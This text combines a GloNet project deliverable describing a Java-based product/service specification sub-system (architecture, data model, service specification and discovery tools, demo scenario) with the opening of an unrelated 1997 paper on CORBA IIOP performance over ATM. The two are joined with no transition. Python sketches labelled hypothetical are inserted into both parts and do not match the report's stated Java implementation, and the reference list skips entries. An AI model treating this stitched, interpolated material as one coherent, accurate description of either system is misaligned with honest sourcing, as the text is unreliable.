The product/service specification (PSS) sub-system is implemented in the Java programming language, using the Spring [9] and Hibernate [10] frameworks. We have used Eclipse as the IDE (Integrated Development Environment) for our programming. Its database is built using the GloNet platform and the MySQL [11] database management system.
In the remainder of this section, we describe the technical details of the approach, as well as the technologies that are used to implement this sub-system of GloNet.
2.1 General architecture
The general architecture for the implementation of the PSS is based on the MVC (Model–View–Controller) software design pattern [8], which enables modular development of this software's sub-systems. Please note that this architecture is a slightly extended version of the PSS architecture presented in [6]. While the original architecture of PSS addressed the PST (product specification tool), the extension here also covers the development of SST (service specification tool) and PSDR (product/service discovery and recommendation). Therefore, figure 2 also represents the new elements added to the Entities and DAOs layers. These extensions are illustrated with boxes containing black text. Nevertheless, the following text addresses all elements of the generated architecture that are reflected in the development of the SST and PSDR tools at each layer.

Figure 2 represents the MVC-based architecture of the PSS sub-system, where it consists of five layers, as briefly described below.
1. **Entities:**
This layer consists of the main entities introduced in the PSS sub-system; these entities are: Service, Request, Product, Object Class, PRODCOM Class-code, Organization, Class, FeatureKind, Feature, and Unit. Figure 3 shows the extended class diagram with the cardinality of inter-relationships among the entity sets for the PSS sub-system, extended through the addition of Product Portfolio and PRODCOM Class-code to the diagram.
The Service entity represents all business services (manual or software) which can be defined in the PSS. The Organization entity briefly characterizes the organization/user who participates in the service specification process as a member of the Design Group. The Feature-kind entity represents all different kinds of features that can be defined in this sub-system within the context of SST and PSDR. The Feature entity characterizes different aspects of a business service and extends every Feature-kind with its value, while the Unit entity specifies the scale for that value. The Request entity is the class representing the request for launching a service (e.g. the composite site maintenance service in a solar plant, as addressed in detail in [7]). The Class entity represents the generalization of the Services.
2. **DAOs (Data Access Object):**
The DAO layer consists of the set of interfaces that represent the base operations developed for accessing each of the entities defined in the lower layer, and enforces that the higher-layer implementations in the PSS access all of these entities only through these minimal interfaces. In fact, the DAO layer allows the entities to be used independently of both the technologies and the data sources.
3. **DAOs’ implementation:**
This layer implements the DAOs addressed in the previous layer, by providing access to each of the entities defined at the entity layer, e.g. access to the Organization entity. We have implemented this layer using web services developed on top of the GloNet platform. Moreover, the DAO implementation provides Hibernate-based access to the MySQL database through the cloud, e.g. to access the product/service and feature specifications.
4. Controllers:
This layer handles the interactions between the users (human or software) and the sub-system, through two separate sets of controller components: (i) the web service interactions (i.e. by software) and (ii) the web interface interactions (i.e. by human).
5. Views:
The Views layer represents a set of different interfaces on the data/information exchanged between the PSS and its users, which are either software systems or humans. This layer benefits from several technologies and standards for the user interface of the PSS, including HTML, JSON, AJAX, jQuery and XML. While HTML is used for human interaction, XML and JSON are used for interaction with software systems. The AJAX technology and the jQuery framework are deployed to produce a smooth and interactive experience for the user.
Please note that [7] provides detailed description of the role played by PRODCOM codes in relation to product/service classes in PSS.
Also the integration of PSS with product portfolio as addressed in the next section, has required the representation of the relation between the Request entity and the name associated with the request in product portfolio.
More details about the implementation architecture of this sub-system and its main components, which are presented in figure 7, are described already in the deliverable [6].
2.2 Data Model
There are two main types of data entities in the PSS sub-system of GloNet, namely the Products and Services of complex products. The data model for the products is already described in detail in [5] and [6]. Figure 4 represents an entity–relationship model (an ER diagram) [12] as the data model describing the different aspects of the business services in the PSS.
This ER diagram shows the relationships among the meta-data elements of the service specification tool (SST), and their cardinalities. It also represents the relation between the enhancing services of sub-products and the other entities defined in the PSS, according to the Entities layer of its general architecture (figure 3).
2.3 Integration of PSS with the other sub-systems of GloNet
The PSS sub-system is integrated with the other sub-systems of the GloNet system. Below is a brief description of this integration for the SST and PST parts of the PSS. Figure 5 shows the integration links between the PSS and the other sub-systems of GloNet.
i. Integration with the GloNet platform: The PSS sub-system connects to the GloNet platform to access the list of VBE members and to authenticate the users of the PSS through its single sign-on feature. Furthermore, during the service specification process, the SST tool gains access to the Process Descriptions (workflows) that the user has defined for the specification of a business service and that are captured in the platform. These workflows are designed using the BPMN Modeler software and uploaded to the platform.
ii. Integration with the Product Portfolio: The PSS creates a Product Portfolio instance in the Product Portfolio system and assigns a customer to it. Finally, the PSS stores an instance of the product or service specification in the Product Portfolio.
iii. Integration with VO formation: The PSS can send a request for launching a VO, which starts the configuration/formation process of a VO corresponding to the specified service or product.
Figure 5- The integration of the PSS sub-system with the other components of the GloNet system
3 PSS – USING PRODUCT/SERVICE SPECIFICATION SUB-SYSTEM
– Focused on SST and PSDR tools
This section provides some examples and snapshots from running the service specification tool (SST) and the Product/Service Discovery and Recommendation (PSDR) tool, while illustrating the final interfaces developed for their use. The development has specifically addressed the functional/non-functional requirements described in detail in [7]. As such, specific emphasis has been put on developing the needed data manipulation operations, i.e. Add, View, and Duplicate, on: services, classes, feature-kinds, and units.
Figure 6 shows the login form of the SST (and the other PSS tools) used to authorize and authenticate users; it applies only when the tool runs standalone, outside GloNet. When logging in through the GloNet platform, however, the GloNet system authenticates the user and the PSS sub-system receives the single sign-on token provided by the platform. In those cases, this login step is bypassed.

Figure 7 shows the first view of the PSS, which provides access to the PST, SST, and PSDR tools after the user has logged in. Below is a screenshot of the general view (header and menus) of the PSS sub-system, as also presented before in [6].
• On the top right, the name of the logged-in user is indicated. A sub-menu under the user name gives access to the user profile, the system status, and a link to log out of the system. The user name appears next to the name of the Design Group in which the user is working. Defining a Design Group helps the user better organize his/her design specifications and provides the possibility of switching between different projects. Moreover, the user's partners in a design group can contribute to the specification of the corresponding services and products.
Please note that when the Design Group is set to Private (as in figure 7), the user works only in his/her private space, without any other partner. As figure 8 shows, the user can also select another Design Group in the sub-menu, involving other partners in product/service specifications.
The Design Group name appears next to the name of My Directory. This option provides the possibility to assign service specifications to which the user has access to his/her directories; it is mainly used to assist the user in organizing his/her own service specification folders/directories.
• On the left side, the three tools (PST, SST and PSDR) developed in the PSS sub-system of GloNet and their main functionalities are represented, each opening a set of menu items. These give access to different functionalities related to the specification of sub-products (PST), the specification of services (SST), and the discovery of products and services (PSDR), described further below and in the following sub-sections.
• In the center, a data entry space for the tool (SST, PST, or PSDR) is presented, according to the functionality selected from the left side.
• On the right side, a number of suggestions may be presented to help the user with the specification process. These include suggestions of related classes, suitable sub-products, recommended enhancing services for sub-products, and suggested features that can be used by the designer in his/her design. These suggestions are described further in the following sections.
Figure 8 – Design Group menu
4 SST AND PSDR TOOLS
Under the Service Specifications tool (SST) menu, there are two sub-menus: Add and Existing candidates. Through the Existing candidates link, the user can view the existing service specifications. The list of specified services shows their names, classes, and a drop-down list of icons (on their right) representing the different actions that can be performed on them, as described later. In the remainder of this section we first describe the different features supported by the SST and PSDR, and then illustrate their functionalities with some screenshots of the developed tools.
4.1 Adding a new service specification
Figure 9 shows a snapshot of the SST interface window, where the Add sub-menu is selected from the menu under Service Specifications (SST). This window supports specifying a new atomic and/or composite business service; as such, it can be used to specify/register/add a new business service at any level of abstraction and granularity.
To simplify the labeling of presentations in this section, this interface window is called “New Service” form. In the New Service window, the user can add an atomic/composite service specification by first providing a unique name for the service. The user can then optionally define one or more classes for the specified service.
Once the user who is specifying a service defines a class for it (e.g. the class “Atomic Service”), the system automatically pops up in this window all the feature-kinds defined for that class. As such, the user is presented with the names of all features that he/she should fill in as part of the specification of that service. Furthermore, while providing input for some of those features might be optional, other features of the class might be mandatory, obliging the user to provide the needed input.
For example, in figure 9, since the user has added the class “Atomic Service” for the service being specified, a set of feature-kinds for this service has automatically popped up in the center of the New Service specification form for further specification. These include the mandatory feature-kinds, such as “Context”, “capabilities”, and “Response time”, which show up automatically on the screen. Providing an input value (i.e. a feature) for these feature-kinds is obligatory (as marked with “*”); therefore, the user must define the value and unit for these features.
There are several other aspects involved in specifying a service that can be defined through this interface. For instance, if a service is composed of other services (a so-called Composite service [13][14]), this fact can be indicated in its specification, under the New constituent Services. Once introduced, the names of constituting services also automatically appear in the specification of the composite service. Consider the example shown in Figure 10. Here, the user has introduced the three needed constituting atomic services for the “site maintenance” service, namely the “Check and Report”, “Wildlife Prevention” and the “Water Drainage”. Therefore, these three services also automatically appear (as in this figure) as a part of this service’s specification.
Please also note that for each of the constituting atomic services, the needed quantity of that service also needs to be specified. As the example shows, the above composite service needs to deploy the “Check and Report” service twice, imagining that it is needed once before the analysis of the damage and once afterward. Therefore, the user has indicated “Check and Report” with the quantity 2, “Wildlife Prevention” with the quantity 1, and the “Water Drainage” with quantity 1. But clearly more than the quantity, the proper specification of a composite service must accompany the specification of inter-connections among its constituting atomic services. For this purpose, a workflow or a BPMN diagram can be defined for the composite business service, representing the orchestration among its constituent services [7]. This aspect is supported by the integration between the PSS sub-system and the GloNet platform, as addressed in Section 2.3, and identified through the feature called Process Description in the composite service specification (see Figure 10). This feature is used to provide a reference to the desired workflow for composite business services. For this purpose, the service designer (current user) creates his/her intended workflow through the GloNet platform that provides a BPMN Modeler, and uploads it to the platform. The BPMN diagram for the
above composite business service example is presented in section C of Annex I, screenshot I.16 (guideline scenario). Then, through the PSS sub-system, when specifying composite services, the system provides a selection menu with the list of existing workflows owned by the user to select from. As shown in figure 10, the designer can then choose his/her desired workflow, the “Site Cleaning-BP”, for the composite business service. Please also note that the remove button (black minus circle) indicates that a feature is optional, i.e. it can be removed. For instance, constituting services of a composite service can be added and/or removed; see figure 10 and its constituting services.
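The composite-service example above, with constituent atomic services carrying quantities plus a Process Description referencing an uploaded workflow, can be captured in a small data structure. The field names below are hypothetical; only the example values come from the text.

```python
# Hypothetical structure for the "Site maintenance" composite service
# described above: each constituent atomic service carries a quantity, and
# the Process Description feature references a BPMN workflow uploaded to
# the GloNet platform.
composite = {
    "name": "Site maintenance",
    "classes": ["Composite Service"],
    "constituents": [
        {"service": "Check and Report", "quantity": 2},   # before and after
        {"service": "Wildlife Prevention", "quantity": 1},
        {"service": "Water Drainage", "quantity": 1},
    ],
    "process_description": "Site Cleaning-BP",  # workflow chosen from platform
}

total_invocations = sum(c["quantity"] for c in composite["constituents"])
print(total_invocations)  # -> 4
```

Note that the quantities alone do not define the orchestration; that is the role of the referenced BPMN workflow, as the text explains.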

Finally, if the user wishes to add any other new features to a service specification, they can be specified at the bottom of the screen through the New Features section of the interface. The user will then need to indicate the feature-kind to which the new feature corresponds. The example presented in figure 11 indicates that the user has entered “Area” as the feature-kind for a new feature that he/she has defined.
The user must then specify both the value and the unit for that feature. It is important to note that, based on the feature-kind the user selects for a new feature, the data types for its value and unit will differ, according to those defined for the corresponding feature-kind. However, if the mentioned feature-kind is not already defined in the system, the user is immediately prompted with a window asking him/her to first create that feature-kind before going further with the definition of the newly introduced feature. This is explained in more detail later in this section. At the last stage of the service specification process, the specification can be saved or discarded through the two buttons at the bottom of this window.

4.2 Adding a new feature-kind
Every service specified through the SST is characterized by a set of features. Any feature in this sub-system requires that its feature-kind be defined prior to its use. To simplify users' tasks, the definition/adding of new feature-kinds, as well as the enhancement of already defined feature-kinds, is supported through a pop-up window, as indicated in the “Create New Feature-Kind” form of figure 12.
In order to add a new feature-kind, the user must first provide a unique name for it, as well as the domain or data type for the values of the features that instantiate this feature-kind. The user can further, optionally, indicate one or more possible units for the domain values of the feature-kind. Figure 12 shows the pop-up window of the Create New Feature-Kind form, which can be triggered while defining a new service specification. At the last stage of the feature-kind specification process, the feature-kind can be either saved or discarded; when saved, it is automatically added to the missing field of the window that triggered it.
4.3 Adding a new unit
Within the Create New Feature-Kind form, users can introduce a new unit (e.g. man-hour) for the features that instantiate a feature-kind, as indicated in figure 12. The user is only required to enter a unique name for the new unit and click on the corresponding plus sign (➕), which appears in front of every unit input. These newly introduced units can then be associated with the features introduced through different feature-kinds. At the last stage of the unit specification process, the newly introduced unit can be either saved or discarded.
4.4 Adding new classes
As discussed before, each service specification can be associated with one or more classes. As such, classes define the meta-data for services, in particular the set of feature-kinds that characterize them, and enable the Request for Launch process. To simplify users' tasks, the definition/adding of new classes is also supported through a pop-up window, as indicated in the “Create New Class” form in figure 13. To add a new class, the user must provide a unique name for that class. The user can then also add a set of obligatory feature-kinds to be associated with this class. Since this window is a pop-up, it is triggered through other interface windows, and every time a new class is saved, it is automatically added to the missing field of the window that triggered it.
4.5 Viewing / managing existing service specifications
Once services are specified, they can be viewed by selecting the “Existing Specifications” item under the service specification menu. Depending on the selected Design Group (indicated in the upper right corner of the screen), the associated existing specifications window appears, showing the list of all relevant existing service specifications (sorted by name) that the user is authorized to view. In other words, the specifications included in this window are all those related to the selected Design Group.
In the example of figure 14, the “iPLON” user has selected the “Amsterdam PoP” Design Group. Consequently, in this example only the restricted service specifications that belong to this Design Group are shown. Please note that while “iPLON” might own only some of these restricted services, other users in the design group might own other specifications.
Other than viewing the service specifications, authorized users can also manage these specifications by performing the following set of actions:
- **View** (shown with the icon 📚) action, which takes the user to the detailed view of the service specification. Figure 15 shows an example of this view for the specification of “Analysis Natural Damage” as an atomic service.
- **Duplication** (shown with the icon 🔄) action, which takes the user directly to a pre-filled “New Service” form. This simplifies the task of users, since in that form the specification information of the selected service is duplicated and can then be edited by the user, thus defining a new, similar service specification.
- **Hide** (shown with the icon 🛡️) action, which allows hiding the corresponding service specification from the Design-Group-restricted existing services window. For instance, the user may find a service useless for his/her use and hide this specification from his/her view.
- **Add to Directory** (shown with the icon 📁) action, which provides the possibility to assign an already defined service specification to which the user has access to an existing directory of the user. This is mainly to assist the user in organizing his/her service specification folders. By default, if the user has not indicated a directory in the top right corner of the screen when specifying a service, the specification is not assigned to any specific directory; when a directory is indicated there, the service is allocated to that directory. Nevertheless, through this action in the Existing Specifications form, services may be assigned and reassigned to different directories.
- **Share with Design Group** (Shown with the icon 📏) action, which provides the user with the option to change the access rights/sharing status of a certain service specification that
he/she owns. The share options are available through the existing services window, when the user clicks on its icon. Please note that when defining a new service specification, the access right to that specification is private by default, that is, if the user has not indicated a Design Group in the top right corner of the screen; otherwise the specification becomes restricted to that Design Group by default. At any point in time, the owner of a service specification is allowed to broaden the access to that specification: if a specification is private, the owner can change it to restricted within a Design Group. But for service specifications that are, for instance, restricted to a Design Group, the access cannot be reduced back to private. In other words, once the owner of a service specification grants certain access rights to others (to view the specification), he/she cannot withdraw that right later.
- **Request for Launch** (shown with the icon 🔄) action, which enables the user to issue a request for the launch of a service specification. This option is explained in more detail in the next sub-section.
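The sharing rule in the Share with Design Group action above, where access may only ever be broadened from private to restricted and never narrowed back, amounts to enforcing a one-way ordering. A hypothetical sketch of that invariant:

```python
# Hypothetical enforcement of the one-way sharing rule described above:
# a private specification can become restricted to a Design Group, but
# granted access is never withdrawn.
ORDER = ["private", "restricted"]   # increasing breadth of access

def change_access(current, requested):
    if ORDER.index(requested) < ORDER.index(current):
        raise ValueError("access rights can only be broadened, never withdrawn")
    return requested

print(change_access("private", "restricted"))   # -> restricted
try:
    change_access("restricted", "private")
except ValueError as err:
    print(err)   # broadening only, as the text specifies
```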
4.6 Sending a Launch Request
When a designer completes the process of specifying an atomic/composite service (at any level of granularity), he/she may wish to initiate the process of realizing that service. For this purpose the SST supports the functionality of a Launch Request (also referred to in this document, in short, as a request) to start this service realization process. As such, when a designer wishes that a certain service specification be realized, he/she can announce this fact by building a request for it. For instance, the designer of a service (check and report, see figure 14), after specifying all its details, can build a launch request for this service while providing its specification. In fact, designers of innovative services are interested to check whether their specifications can in fact be realized, meaning that they wish to know if their specifications are constructible and can materialize, and by which potential consortium of companies this can be done.
In order to build a launch request, the user can use the interface developed in the SST, as indicated in figure 14 and labeled as “Request for Launch” in the Existing Services form. Using this option, the user can send a new launch request for one of the already specified services. Please note that before a new Launch Request can be built for a service specification, the service must first be properly specified. Then, through the interface presented in the Launch Request form, the user identifies a specified service (i.e. indicates its specification) to be included in the package for this launch request.

Besides identifying the services, when defining and creating a launch request (also called packaging product/service specifications), it must be clear for which customer this design has been made. Moreover, the name of the complex product for which this service is being launched must be indicated, so that the specification can be stored properly in the product portfolio.
In figure 16, a service specification (e.g. “Check and Report”) is requested to be launched. The value of the “by” field of the request package is set from the user name of whoever is logged into the system (e.g. “iPLON”). The value of the “for” field of the request is the customer name, “City of Amsterdam” in this example. Finally, this specification is later stored in the portfolio that belongs to the “Amsterdam Power Plant”.
At the last stage of the launch request process, the request definition can be saved through the button at the bottom of the form.
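The request package described for figure 16 bundles the specification with the requester (“by”), the customer (“for”), and the target portfolio. A minimal sketch, with the record layout assumed rather than taken from the actual GloNet format:

```python
# Hypothetical packaging of a Launch Request as described for figure 16;
# the actual GloNet record format is not shown in this report.
def build_launch_request(spec_name, logged_in_user, customer, portfolio):
    return {
        "specification": spec_name,
        "by": logged_in_user,    # filled automatically from the session
        "for": customer,
        "portfolio": portfolio,  # where the spec is stored afterwards
    }

req = build_launch_request("Check and Report", "iPLON",
                           "City of Amsterdam", "Amsterdam Power Plant")
print(req["by"], "->", req["for"])   # -> iPLON -> City of Amsterdam
```

Saving such a request is what triggers the VO formation integration described in section 2.3.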
4.7 PSDR – Discovering Services
The menu item Discover Service, in the left column, is located under the Product/Service Discovery (PSDR) menu item. It opens a form to discover services and to rank the matched suggestions based on the user query. This constitutes part of the product/service discovery and recommendation engine of the general GloNet architecture. In fact, this part of the tool implements our mechanisms for discovery and matchmaking between the user's required criteria and the existing service specifications, in order to offer service designers the best-matched business services. As described in [7], the ranking is done according to a similarity score that expresses approximate bi-simulation [15] between the registered specification of each service and the user-submitted query. The discovery of the best-fitting services can be based on all the service specification features, including the service's syntax, semantics, behavior, and quality criteria.
Figure 17 shows a screenshot of the Service Discovery form, where the user can select some of the service features as the criteria of the search, and then set his/her desired values for them.
Figure 17 – Service Discovery form
Figure 18 shows the result window of the matched services for the example query, which is represented in figure 17. The results are ranked by the calculated similarity scores of the registered services. The mechanism of the search and ranking suggestions is described in [7].
4.8 PSDR – Discovering Products
The link to Discover Product, located under the Product/Service Discovery (PSDR) menu, opens a form to discover products and rank the matched suggestions based on a user query. It constitutes part of the product/service discovery and recommendation engine of the general architecture. As already described in [7], the ranking is done based on the calculated similarity scores of the registered products, analogously to the service discovery described above.
Figure 19 shows a screenshot of the Product Discovery form, where the user can select some of the product features as the criteria of the search, and also indicate his/her desired values for them.
Figure 19 – Product Discovery form
Figure 20 shows the result window of the matched products for the example query, which is represented in figure 19. The mechanism of the search and ranking suggestions is described in [7].
Figure 20 – An example of Product Result window
5 CONCLUDING REMARKS
This report describes the prototype developed for the Service Specification Tool (SST) and the Product/Service Discovery and Recommendation engine (PSDR). It takes as its main input the specified design requirements and the introduced mechanisms for dynamically customizable services enhancing complex products, as addressed in [7].
The advantage of the currently developed prototype reported in this document is that it is both generic and reusable for different domains (other VBEs) and not limited to the solar power plants and intelligent buildings domains. Moreover, these two tools (SST and PSDR) as well as the product specification tool (PST) have been integrated within the Product/Service Specification (PSS) sub-system of GloNet. The PSS sub-system is further integrated with the GloNet platform, the product portfolio, the VBE management, and the VO formation sub-systems.
Finally, the developed PSS sub-system also serves as the base for other developments in WP5, namely for providing and packaging the needed input for the consortium formation and operation support functionality.
6 REFERENCES
1. GloNet D1.1 deliverable – Detailed Requirements for GloNet use case and Domain Glossary
2. GloNet D1.2 deliverable – Detailed Requirements for GloNet use case and Domain Glossary
3. GloNet D2.1 deliverable – Required Information/Knowledge Provision Services Specification
4. GloNet D2.4 deliverable - Mechanisms for defining composed services to support collaboration
5. GloNet D4.1 deliverable - Design report on approach and mechanism for effective customized complex product specification
6. GloNet D4.2 deliverable - Prototype of Services supporting iterative complex product specification
7. GloNet D4.3 deliverable - Report on dynamically customizable services enhancing products
11. MySQL http://www.mysql.com
ANNEX I- AN EXAMPLE SCENARIO AS A GUIDELINE FOR THE PSS
A few notes upfront:
As a guideline for the usage of the PSS sub-system, this annex briefly presents a demonstration plan for version 3 of the PSS. Further to the guideline for the PST demonstration in Deliverable 4.2, this final version has some extra functions related to the SST and PSDR. In this demonstration we have over-simplified the specification process at each stage due to time constraints; please note that in practice specifications are made gradually, through an iterative process. Please also note that the PST, SST and PSDR are equipped with “smart” autocomplete/suggestions for input fields.
A. Amsterdam solar power plant – PRE-PLC Stage
1. An EPC (iPLON) has received a tender for constructing a solar power plant in Amsterdam
2. In order to prepare a bid, iPLON should first select its initial partners for the project, for which it needs to evaluate and select the needed technologies.
3. This can only be achieved after a rough specification is made and the critical features of the complex product are identified.
4. So, iPLON opens the “add product” form by clicking on the add option in product specification (Click) (see screenshot I.1).
5. The first step for iPLON is to identify which high level classes of products this complex product falls under.
6. Let’s imagine that iPLON notices that a class (Power Plant) that is needed is not defined in the system. iPLON requests to add the new class by clicking on the plus button in front of the class field (see screenshot I.2).
7. This opens up a window for iPLON to specify a new class.
8. iPLON introduces a name for the class (i.e. Power Plant) and specifies the possible corresponding PRODCOM code (power or C27.11.43) for the class. It can also specify a number of required features (Power Capacity) for the class, and clicks add to save (see screenshots I.3 and I.4).
9. After saving, iPLON is guided back to the “add product” form so that it can continue with the specification.
10. Here, the just-added class is introduced. iPLON can choose to introduce more classes or even remove the just-introduced class (Power Plant).
11. Each introduced class causes the system to ask for a set of obligatory features. So iPLON must fill in the value and units of the required features.
12. It’s important to note that the fields for the features are restricted to pre-defined conditions (e.g. pre-defined units).
13. iPLON can also specify features that are not mandated by the classes, by introducing them using the new feature field (see screenshots I.5 and I.6).


14. Let’s assume that at this point iPLON identifies the need for a feature-kind that has not yet been introduced in the PST system (so no help is provided by autocomplete and, as a result, it is not shown in the drop-down menu); iPLON can add one by clicking the + button (see screenshot I.7).
15. This opens a dialog for iPLON to specify the feature-kind; iPLON can specify the name, the type of the feature-kind, and the possible units for it (see screenshot I.8).
16. After clicking add, the system returns iPLON to the “add product” form again and this new feature-kind is introduced for the product specification.
17. At the end iPLON specifies the value and units of all features and clicks save.
18. At this point iPLON selects existing specifications in products and, using the drop-down option beside the view button for a given specification, finds more advanced functions that can be performed on the specification.
19. Here iPLON clicks the “Request for launch” button to request a VO formation for the given specification (see screenshots I.9 and I.10).
**Screenshot I.10**
---
**B. Amsterdam solar power plant – Design Stage**
1. After the EPC (iPLON) has been accepted for constructing a solar power plant in Amsterdam
2. In preparation for constructing the power plant iPLON (with the help of its initial partners) should first make the detailed design/specification of the power plant in order to select partners for the construction of the power plant.
3. iPLON starts this process by creating a design group, sharing the rough specification of the Amsterdam power plant and inviting the initial partners to help in the process of specifying the detailed specification.
4. All members of the Initial VO (Amsterdam Power Plant-Bid) constitute the members of a design group (called Amsterdam PP design)
5. At this stage some of the initial partners might ask other partners to join the design group(s) in order to contribute to the detailed specification.
6. If there is time I can show you how members are added later
7. iPLON Shares the initial designs with the Design group
8. **Please note that any user can also create a new design group independent of the VO in specific cases.**
9. After being part of the design group, each partner can view the design group he is a member of and can specify detailed specifications of sub-products and services required for the complex product (i.e. Amsterdam power plant) by reviewing the initial specification.
10. For example, Prolon re-uses and customizes an existing specification of a sub-product (Pyranometer) for the Amsterdam power plant by duplicating it, and shares it with the design group.
11. This also applies to services; for example, SKILL can specify a business service (wildlife prevention).
12. By clicking the add service option in service specification, SKILL can specify an atomic business service (see screenshot I.11).
Screenshot I.11
13. After all partners have specified the sub-products and services, iPLON duplicates the previously defined complex product (see screenshot I.12).
Screenshot I.12
14. iPLON adds the newly defined/existing sub-products and some features to the duplicate, and renames it (see screenshots I.13 and I.14).
15. iPLON requests a launch of the complex product (see screenshot I.15).
C. Amsterdam solar plant – O & M Stage
1. A partner involved in the power plant (SKILL) identifies the need for a new composed business service to support the power plant (Site maintenance).
2. In order to achieve this, SKILL identifies the existing services it can use to implement the composite business service.
3. It first designs the process description (Workflow) using the GloNet BPMN modeler and uploads the workflow to the platform (see screenshot I.16).
4. Then it specifies the composite business service using the add service function.
5. Here it specifies a name for the service, adds the class “composite service”, and any other classes it finds relevant.
6. Then he adds the constituting services to the specification. And fills in the required features for composite services. One of these is business process, in this feature he selects the workflow he has uploaded previously from the menu (see screenshot I.17).
7. Finally, after registering the service specification, it chooses the existing specifications and launches the service (see screenshot I.18).
CONSORTIUM
CAS Software AG, Germany
Project coordinator: Dr. Bernhard Koelmel
UNINOVA – Instituto de Desenvolvimento de Novas Tecnologias, Portugal
Technical coordinator: Prof. Luis M. Camarinha-Matos
Universiteit van Amsterdam, Netherlands
iPLON GmbH The Infranet Company, Germany
Steinbeis GmbH & Co., Germany
SKILL Estrategia S.L., Spain
Komix s.r.o., Czech Republic
Prolon Control Systems, Denmark
Member of the:
www.glonet-fines.eu
Optimizing the Performance of the CORBA Internet Inter-ORB Protocol Over ATM
Authors: Aniruddha Gokhale and Douglas C. Schmidt
Follow this and additional works at: http://openscholarship.wustl.edu/cse_research
Part of the Computer Engineering Commons, and the Computer Sciences Commons
Recommended Citation
http://openscholarship.wustl.edu/cse_research/427
Optimizing the Performance of the CORBA Internet Inter-ORB Protocol Over ATM
Aniruddha Gokhale and Douglas C. Schmidt
WUCS-97-10
February 1997
Department of Computer Science
Washington University
Campus Box 1045
One Brookings Drive
St. Louis MO 63130
gokhale@cs.wustl.edu and schmidt@cs.wustl.edu
Department of Computer Science, Washington University
St. Louis, MO 63130, USA
This paper has been submitted for publication. It can be referenced as Washington University technical report #WUCS-97-10.
Abstract
The Internet Inter-ORB Protocol (IIOP) enables heterogeneous CORBA-compliant Object Request Brokers (ORBs) to interoperate over TCP/IP networks. The IIOP uses the Common Data Representation (CDR) transfer syntax to map CORBA Interface Definition Language (IDL) data types into a bi-canonical wire format. Due to the excessive marshaling/demarshaling overhead, data copying, and high-levels of function call overhead, conventional implementations of IIOP protocols yield poor performance over high speed networks. To meet the demands of emerging distributed multimedia applications, CORBA-compliant ORBs must support both interoperable and highly efficient IIOP implementations.
This paper provides two contributions to the study and design of high performance CORBA IIOP implementations. First, we precisely pinpoint the key sources of overhead in the SunSoft IIOP implementation (which is the standard reference implementation of IIOP written in C++) by measuring its performance for transferring richly-typed data over a high speed ATM network. Second, we empirically demonstrate the benefits that stem from systematically applying protocol optimizations to SunSoft IIOP. These optimizations include: optimizing for the expected case; eliminating obvious waste; replacing general purpose methods with specialized, efficient ones; precomputing values, if possible; storing redundant state to speed up expensive operations; and passing information between layers.
The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octets, and 4.2 times for richly-typed structures over ATM networks. Our optimized implementation is now competitive with existing commercial ORBs using the static invocation interface (SII) and 2 to 4.5 times (depending on the data type) faster than commercial ORBs using the dynamic skeleton interface (DSI). Moreover, our optimizations are fully CORBA compliant and we maintain strict interoperability with other IIOP implementations such as Visigenic’s VisiBroker and IONA’s Orbix.
Keywords: Distributed object computing, CORBA, IIOP, communication middleware protocol optimizations, high-speed networks.
1 Motivation
An increasingly important class of distributed applications require stringent quality of service (QoS) guarantees. These applications include telecommunication systems (e.g., call processing and switching), avionics control systems (e.g., operational flight programs for fighter aircraft), multimedia (e.g., video-on-demand and teleconferencing), and simulations (e.g., battle readiness planning). In addition to requiring QoS guarantees, these applications must be flexible and reusable.
The Common Object Request Broker Architecture (CORBA) is a distributed object computing middleware standard defined by the Object Management Group (OMG) [15]. CORBA is intended to support the production of flexible and reusable distributed services and applications. Many implementations of CORBA are now available.
The CORBA 2.0 specification requires Object Request Brokers (ORBs) to support a standard interoperability protocol. The CORBA specification defines an abstract interoperability protocol called the General Inter-ORB Protocol (GIOP). Specialized mappings of GIOP can be defined to operate over particular transport protocols. One such mapping is called the Internet Inter-ORB Protocol (IIOP), which is the emerging standard GIOP mapping for distributed object computing over TCP/IP. The latest release of Netscape integrates IIOP into its Web browser, making IIOP the most widely available protocol for interoperability between heterogeneous ORBs.
[8, 9, 10] show that the performance of CORBA implementations is poor compared to that of low-level implementations using C/C++, since the ORBs incur a significant amount of data copying, marshaling, demarshaling, and demultiplexing overhead. These results, however, were restricted to measuring the performance of communication between homogeneous ORBs. They do not measure the runtime costs of interoperability between heterogeneous ORBs. In addition, earlier work on measuring CORBA performance does not provide solutions for reducing key sources of ORB overhead.
In this paper, we measure the performance of the standard reference implementation of IIOP, written by SunSoft, using a CORBA/ATM testbed environment similar to [8, 9, 10]. We measure the performance of SunSoft IIOP and precisely pinpoint the performance overhead. In addition, we describe how we applied six principle-driven optimizations [21] to substantially improve the performance of SunSoft IIOP. These optimizations include: optimizing for the expected case; eliminating obvious waste; replacing general purpose methods with specialized, efficient ones; precomputing values, if possible; storing redundant state to speed up expensive operations; and passing information between layers.
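One of these principles, optimizing for the expected case, can be illustrated with a rough sketch (in Python for brevity; the function names are hypothetical, not SunSoft IIOP's API). A generic interpretive marshaler touches every element individually, while a specialized fast path bulk-copies an octet sequence, whose elements need no byte swapping or alignment:

```python
import struct

def marshal_octets_generic(seq):
    """Generic interpretive path: one pack call per element (high
    function-call overhead), the pattern being optimized away."""
    out = [struct.pack(">l", len(seq))]   # CDR sequences are length-prefixed
    for octet in seq:
        out.append(struct.pack("B", octet))
    return b"".join(out)

def marshal_octets_fast(seq):
    """Expected-case path: octets need no byte swapping or padding,
    so the whole sequence can be block-copied in one operation."""
    return struct.pack(">l", len(seq)) + bytes(seq)
```

Both paths produce the same wire bytes; the specialized path simply avoids the per-element interpreter round trips.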
The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octets, and 4.2 times for richly-typed structs over ATM networks. Our optimized IIOP implementation is now comparable to existing commercial ORBs [8, 9, 10] using the static invocation interface (SII) and around 2 to 4.5 times (depending on the data type) faster than commercial ORBs using the dynamic skeleton interface (DSI). The optimizations and the resulting speedups reported in this paper are essential for CORBA to be adopted as the standard for implementing high-bandwidth, low-latency distributed applications.
Improving IIOP performance is not our only requirement, however, since optimizations must not come at the expense of interoperability. Therefore, we illustrate that our optimized implementation of SunSoft IIOP interoperates seamlessly with Visigenic's VisiBroker for C++ ORB.
